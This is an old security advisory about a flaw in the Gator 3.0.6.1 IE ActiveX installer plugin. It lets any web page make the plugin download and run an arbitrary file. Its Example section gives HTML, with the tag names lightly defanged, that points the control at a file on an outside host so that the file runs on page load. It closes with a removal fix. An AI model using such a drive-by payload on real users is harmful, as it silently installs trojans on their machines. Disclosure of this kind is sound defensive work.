COMMAND

	Gator installer Plugin allows any software to be installed

SYSTEMS AFFECTED

	Gator DLL version - 3.0.6.1

PROBLEM

	In Obscure^ advisory
	

	 [http://eyeonsecurity.net/advisories/gatorieplugin.html]

	

	

	The issue here is that any HTML page can specify  the  location  of  the
	Gator installation file. The installation file is  downloaded,  then  it
	is checked for the filename. If the filename is setup.ex_,  it  is  then
	decompressed and executed. If the file is not compressed it  will  still
	execute it. Of course using this method, a  malicious  user  can  easily
	create an HTML page which makes use of the rogue  ActiveX  component  to
	point at a trojan file.
	

	 Example

	 =======

	

	<xbject

	         id=\"IEGator\"

	         classid=\"CLSID:29EEFF42-F3FA-11D5-A9D5-00500413153C\"

	

	codebase=\"http://www.gator.com/download/2500/iegator_3061_gatorsetup.cab\"

	         align=\"baseline\"

	         border=\"0\"

	         width=\"400\"

	         height=\"20\">

	<pxram name=\"params\"

	value=\"fcn=setup&src=eyeonsecurity.net/advisories/gatorexploit/setup.ex_&bgc

	olor=F0F1D0&aic=\",aicStr,\"&\">

	</xbject>

	

SOLUTION

	Simply delete the ActiveX component  from  %windir%\\Downloaded  Program
	Files.